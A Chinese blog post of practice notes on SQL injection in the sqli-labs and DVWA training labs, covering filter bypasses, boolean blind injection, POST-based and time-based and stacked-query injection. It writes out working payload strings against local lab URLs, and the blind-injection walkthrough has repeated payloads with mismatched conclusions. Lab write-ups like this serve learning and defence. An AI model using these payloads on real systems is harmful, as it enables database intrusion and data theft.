sqli-lab靶场的一次练习与总结

最新推荐文章于 2024-11-04 22:02:48 发布
最新推荐文章于 2024-11-04 22:02:48 发布
阅读量47 收藏
点赞数
文章标签: 数据库 sql mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_55380871/article/details/130530894
版权
文章详细介绍了SQL注入的多种技术,包括利用空格绕过过滤、大小写注入、通过orderby判断字段数量、数据库模式探测等。同时,讲解了基于布尔的SQL盲注步骤和基于POST请求的SQL注入检测方法,还提到了基于时间的注入攻击和堆叠查询注入等进阶话题。
摘要由CSDN通过智能技术生成

因为靶场的id值空格会被省略,用符号来取消

  1. 大小写注入

Less 27

单引号闭合,为字符型

http://127.0.0.1/sqli/Less-27/?id=1%27%20and%20%271%27%20=%271

Less-27 Trick with SELECT & UNION

注入绕过技巧

不过滤空格方法

使用/**/

使用order by 判断语句用了几个字段

http://127.0.0.1/sqli/Less-27/?id=1%27/*%20*/%20order/*%20*/%20by/*%20*/%203;#

还是出错,那就换字符()()试试

Id=1’()order()by()2;#

使用%

不断尝试各种符号,使得过滤器不在过滤空格

然后就可以实现查询

Where id=‘1’ order by 1||‘1’=‘1’;

使用/%0a*/强制空格

大小写绕过

数据库模式探测

Database()

1、基于布尔的SQL 盲注

Step 1:判断注入

Step 2:猜测可能的SQL 语句

Step 3:探测数据库模式

SELECT * FROM table_users WHERE uid=’id’;

id=1’ and (select if(1=1, 1, 0));#

SELECT * FROM table_users WHERE uid=’ 1’ and (select if(1=1, 1, 0));#’;

用户存在

id=1’ and (select if(1=2, 1, 0));#

SELECT * FROM table_users WHERE uid=’ 1’ and (select if(1=2, 1, 0));#’;

用户不存在

猜测当前数据库的名称:

a b c d e f g h i j k l m n o p q r s t u v w x y z

1' and (select if(ascii(substring(database(), 1, 1))<ascii('a'), 1, 0));#

用户不存在 è数据库名称首字符比’a’

1' and (select if(ascii(substring(database(), 1, 1))<ascii('n'), 1, 0));#

用户不存在 è数据库名称首字符比’n’

1' and (select if(ascii(substring(database(), 1, 1))<ascii('g'), 1, 0));#

用户不存在 è数据库名称首字符比’g’

1' and (select if(ascii(substring(database(), 1, 1))<ascii('g'), 1, 0));#

用户不存在 è数据库名称首字符大于或等于’d’

1' and (select if(ascii(substring(database(), 1, 1))<ascii('g'), 1, 0));#

用户不存在 è数据库名称首字符比’e’

推断数据库名称的首字符为d

以此类推,查询数据库中的表,列名称以及对应的值

2HTTP 请求方法

AGET 方法

http://10.211.55.4/dvwa/vulnerabilities/sqli/?id=3&Submit=Submit#

BPOST 方法

http://10.211.55.4/dvwa/vulnerabilities/sqli/#

3、基于POST 请求的SQL 注入

Step 1:判断注入类型

1’ 或者1’ and ‘1’=’1 è报错,推断不是字符型SQL 注入

1 and 1=1 è正确

  1. and 1=2 è错误

推断出这是一个整数型SQL 注入

  1.  

Step 2:推测SQL 查询语句

SELECT first_name,sur_name from table_users WHERE uid=id;

Step 3:用order by 子句推测SELECT 的列数

Order by 2 è正确

Order by 3 è错误

推断SELECT 语句选择了2

Step 4:探测数据库模式

探测当前连接数据库的用户名和数据库名称

探测出数据库dvwa 数据库的模式

3SQL 注入进阶

——基于时间的注入攻击

Sleep 函数,benchmark 类似函数

建议:如果能够转换为基于布尔型SQL 盲注,尽量避免基于时间的 盲注

——堆叠查询注入

可以通过SQL 注入多条SQL 执行语句

DVWA:Low:SQL Injection

SELECT * FROM table_users WHERE user_id=’id’;

id= 1'; select if(current_user() LIKE 'root%', 0, sleep(5));#

SELECT * FROM table_users WHERE user_id=’ 1'; select if(current_user() LIKE 'root%', 0, sleep(5));#’;

 

huachaiufo
关注
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs靶场练习笔记
11-09
### SQLi-Labs靶场练习笔记知识点概览 #### 一、SQL注入基本概念与原理 - **定义**:SQL注入是一种常见的应用层攻击方式,它利用编程中的漏洞,通过在应用程序的输入框中插入恶意SQL语句来控制后端数据库服务器。 -...
sqli-labs靶场
05-30
"sqli-labs靶场"是一个专门用于学习和测试SQL注入技术的平台,它提供了多种不同类型的SQL注入场景,帮助安全研究人员和开发人员了解并防御这种攻击。 在sqli-labs靶场中,用户可以实践各种SQL注入技巧,如错误注入...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
Sqli-labs-maste 靶场的下载, phpStudy 下载
09-13
php 环境,sqlmap 注入测试项目:Sqli-labs-maste 一步到位
oceanbase V4.2.2社区版集群离线部署
king_harry的专栏
11-01 740
版本,选择是上传文件,包含oceanbase-ce、oceanbase-ce-libs、oceanbase-ce-utils。关闭时展示,为 OBProxy 集群的访问地址,仅用于生成租户的连接串,不影响实际使用,需要自主配置负载均衡,如果是 VIP 地址,还需要您自主申请并绑定到 OBProxy Server。集群配置选项卡—更多配置—更改系统内存保留选项,默认是30G,如果测试机内存只有16G,则需要调小,本测试调整为2G,这样ocp-server安装不会失败。自定义待管理的集群的名称。
VB.NET中如何利用Entity Framework Core进行轻量级ORM操作
2402_84885073的博客
11-01 450
实体类表示数据库中的表。你需要为每个表定义一个类,并在其中定义属性以映射到表的列。vb复制代码' 其他属性...End Class。
安利一款开源企业级的报表系统SpringReport
luck332的专栏
11-04 446
SpringReport是一款企业级的报表系统,支持在线设计报表,并绑定动态数据源,无需写代码即可快速生成想要的报表,可以支持excel报表和word报表两种格式,同时还可以支持excel多人协同编辑,后续考虑实现大屏设计器功能,通过简单的设计器可以生成炫酷的大屏效果。
【重学 MySQL】七十九、深入探索用户变量
CSDN全栈领域优秀博主,阿里云博客专家,工信部权威认证物联网技术开发工程师,曾30分钟高分通过C语言二级,两天手撸代码完成EasyX飞机大战,靠接软件私活一个月换苹果电脑
10-30 915
定义:用户变量以“@”符号开头,后面跟着变量名。变量名可以是任何随机的、复合的标量表达式,只要其中没有列指定。赋值可以使用SET语句来定义和赋值用户变量,如。也可以使用SELECT语句来为用户变量赋值,但必须使用“:=”赋值运算符,因为在SELECT语句中,MySQL将“=”运算符视为等于运算符。例如,。作用域:会话用户变量的作用域是当前会话,而局部变量的作用域是其定义的BEGIN/END语句块。命名:会话用户变量以“@”符号开头,而局部变量不需要。使用场景。
真·香!深度体验 zCloud 数据库云管平台 -- DBA日常管理篇
weixin_54551388的博客
11-01 721
点击蓝字 关注我们zCloud 作为一款业界领先的数据库云管平台,通过云化自治的部署能力、智能巡检和诊断能力、知识即代码的沉淀能力,为DBA的日常管理工作带来了革新式的简化与优化。经过一周的深度体验,今天笔者与您深入探讨 zCloud 在数据库用户、参数以及日志管理方面的具体应用,看它如何为DBA的日常管理工作带来价值。数据库用户管理“常在河边走哪有不湿鞋”,作为DBA或多或少都曾遇到过因权限配置...
SpringSession源码分析
lkr_lkr的博客
11-01 321
默认对常规Session的理解和使用,如何使用Set-Cookie。
数据库
wjj20040809的博客
11-02 682
表与表的关系:核心表mysql/oracle、SQLServer(微软)SQL
shodan7,shodan参数使用,常用端口,Google语法
2202_75361164的博客
10-31 373
泷羽sec课程笔记,星河飞雪计划 截图搜索参数has_screenshot:true cisco。我们能在web页面上面去做,而且更加方便,所以就不多讲了。搜索关于cisco产品的截图。
SpringBoot starter机制
路漫漫其修远兮,吾将上下而求索
10-30 288
在spring boot之前,想要在spring中集成redis,需要做的事情包括:(1)引入jar包:包括redis的jar包,redis依赖的jar包,相应的版本,与spring版本是否兼容等(2)在配置文件中配置连接地址、端口号等(3)以Jedis为例,增加增加JedisConnectionFactory、RedisTemplate 的bean初始化代码(4)使用RedisTemplate可以看到,集成过程比较复杂,而这些过程跟业务开发没有任何关系。
qt QFocusEvent详解
ckg3824278的博客
11-04 372
QFocusEvent是Qt C++框架中的一个事件类,它专门用于处理与焦点变化相关的事件。在图形用户界面(GUI)编程中,焦点事件是不可或缺的一部分,它们允许开发者在控件获取或失去焦点时执行特定的操作。QFocusEvent通常与QWidget类及其子类一起使用,是Qt事件处理机制中的重要组成部分。
mysql
qq_41413211的博客
10-31 106
MySQL允许客户端会话显式获取表锁,以防止其他会话在特定时间段内访问同一个表。它无法获取或释放其他会话的表锁。意思是返回acces_log表中,site_id==3的count一列的总数。UPDATE 表名称 SET 列名称 = 新值 WHERE 列名称 = 某值。1.可用于select、update、delete、insert语句。执行,若where和having一起用,先执行where。我的理解:把某个表“锁住”,只能自己这个会话来读或者写。engine这一块不是很懂。返回指定列的值的数目。
MyBatis 第二章
最新发布
YUELEI118的博客
11-04 430
大致来看,mybatis是通过配置文件来实现对数据的操作,主要工作就是在解析配置文件。
!!!分布式数据库
speaking_me的博客
11-04 389
分布式数据库(Distributed Database)是指数据分布在多个物理位置的计算机上,但逻辑上被视为一个整体的数据库系统。这些计算机通过网络连接,协同工作以提供数据的存储、管理和查询服务。分布式数据库通过将数据分布在多个节点上,实现了高可扩展性、高可用性和高性能。然而,分布式数据库也面临着数据一致性、故障恢复和网络延迟等挑战。通过合理的设计和管理,分布式数据库可以有效支持大规模数据处理和高并发系统的需求。
Redis 命令集 (超级详细)
weixin_46203834的博客
10-24 1597
redis 常用命令集, string 类型, hash类型, list 类型, set 类型, zset 类型, bitmap 类型, geo类型, redis命令和java的redisTemplate的对应关系
PHPStudy与sqli-labs靶场环境搭建教程
总结:phpstudy与sqli-labs-master的结合使用,为学习PHP开发和SQL注入提供了一个便利的学习平台,通过实践操作加深对相关知识的理解。同时,用户在学习过程中需要遵循安全原则,确保实验环境的安全性,合理利用资源...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值